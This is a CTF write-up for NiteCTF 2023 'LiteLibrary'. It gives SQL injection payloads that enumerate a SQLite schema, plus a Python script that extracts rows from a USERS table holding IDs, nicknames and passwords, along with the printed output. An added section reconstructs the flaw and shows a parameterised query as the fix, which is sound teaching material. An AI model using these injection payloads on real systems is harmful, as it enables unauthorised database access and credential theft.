NiteCTF 2023 : LiteLibrary

Context

We're given a website (http://litelibrary.web.nitectf.live) that serves as a library.

Writeup

On the website, we find an API endpoint at /api/search. Requesting /api/search?q=aaa'+OR+1=1 shows that it is vulnerable to SQL injection. A few more probes reveal which DBMS is in use: the request /api/search?q='+union+select+sqlite_version(),2,3,4,5-- confirms that it is backed by a SQLite database.

We can also enumerate the database's tables with this request:

Request:
GET /api/search?q=aaaaaa'+union+select+table,2,3,4,5+from+sqlite_schema+order+by+name+limit+1,1-- HTTP/1.1

Response:
[{"title":"CREATE TABLE USERS (liteId TEXT, liteUsername TEXT, gender TEXT, liteNick TEXT, litePass TEXT, dateCreated TEXT)","author":2,"pages":3,"imageLink":4,"link":5}]

So, in order to extract the USERS table, we can use this script that I wrote:

import requests

# Prefix of the injected search: UNION the USERS columns into the five-column book result,
# then page through the users one row at a time with LIMIT <offset>,1
api_url_s = "http://litelibrary.web.nitectf.live/api/search?q=aaaaa'+UNION+SELECT+liteUsername,liteId,liteNick,litePass,4+FROM+USERS+ORDER+BY+liteId+LIMIT+"
api_url_e = ",1--"
for i in range(0, 100):  # one user row per request
    r = requests.get(api_url_s + str(i) + api_url_e)
    if r.status_code == 200:
        if "nite{" in r.text:  # only print the row that carries the flag format
            print(f"{i}:", r.text)

Running this script, we find the flag:

$ py extract.py
55: [{"title":"madmaxfuryyyyy2344","author":"28582015-49f6-43f8-9aad-a9e5d4a5687f","pages":"nite{t00_l1t3_huh_50m30n3_g37_an71_g2av17y_0v3r_h3r3}","imageLink":"yeehaaw1amMadx","link":4}]
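To make the root cause concrete, here is an added example (not code from the challenge or from this writeup) that reconstructs a plausible /api/search query on an in-memory SQLite database and runs the USERS extraction payload from the script above against a string-concatenated query and against a parameterised one. The BOOKS layout, the rows and the function names are assumptions based on the leaked CREATE TABLE statement and the JSON keys in the responses.

```python
import sqlite3

# Constructed stand-in for the challenge database (assumption: column names come from
# the JSON keys and the leaked CREATE TABLE USERS statement; the rows are made up).
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE BOOKS (title TEXT, author TEXT, pages INTEGER, imageLink TEXT, link TEXT);
        CREATE TABLE USERS (liteId TEXT, liteUsername TEXT, gender TEXT, liteNick TEXT,
                            litePass TEXT, dateCreated TEXT);
        INSERT INTO BOOKS VALUES ('Dune', 'Frank Herbert', 412, 'dune.png', '/books/1');
        INSERT INTO BOOKS VALUES ('Neuromancer', 'William Gibson', 271, 'neuro.png', '/books/2');
        INSERT INTO USERS VALUES ('id-0001', 'alice', 'f', 'FLAG_PLACEHOLDER', 'pw-hash', '2023-01-01');
    """)
    return con

COLUMNS = ("title", "author", "pages", "imageLink", "link")

# The USERS extraction payload used by the script above, for the first row (offset 0).
PAYLOAD = "aaaaa' UNION SELECT liteUsername,liteId,liteNick,litePass,4 FROM USERS LIMIT 0,1--"

def search_vulnerable(con, q):
    """Hypothetical reconstruction of /api/search: q is concatenated into the SQL text,
    so a single quote ends the literal and the rest of q is parsed as SQL."""
    sql = f"SELECT title, author, pages, imageLink, link FROM BOOKS WHERE title LIKE '%{q}%'"
    return [dict(zip(COLUMNS, row)) for row in con.execute(sql)]

def search_safe(con, q):
    """Hardened version: q is bound as a parameter, so it can only ever be a LIKE pattern."""
    sql = "SELECT title, author, pages, imageLink, link FROM BOOKS WHERE title LIKE ?"
    return [dict(zip(COLUMNS, row)) for row in con.execute(sql, ("%" + q + "%",))]

if __name__ == "__main__":
    con = build_db()
    print("vulnerable:", search_vulnerable(con, PAYLOAD))  # a USERS row comes back as a 'book'
    print("hardened:  ", search_safe(con, PAYLOAD))        # no title matches, nothing leaks
```

With the vulnerable query the USERS row lands in the book columns exactly as in the response above (liteNick shows up under "pages"), while the parameterised query treats the whole payload as a search string and returns nothing.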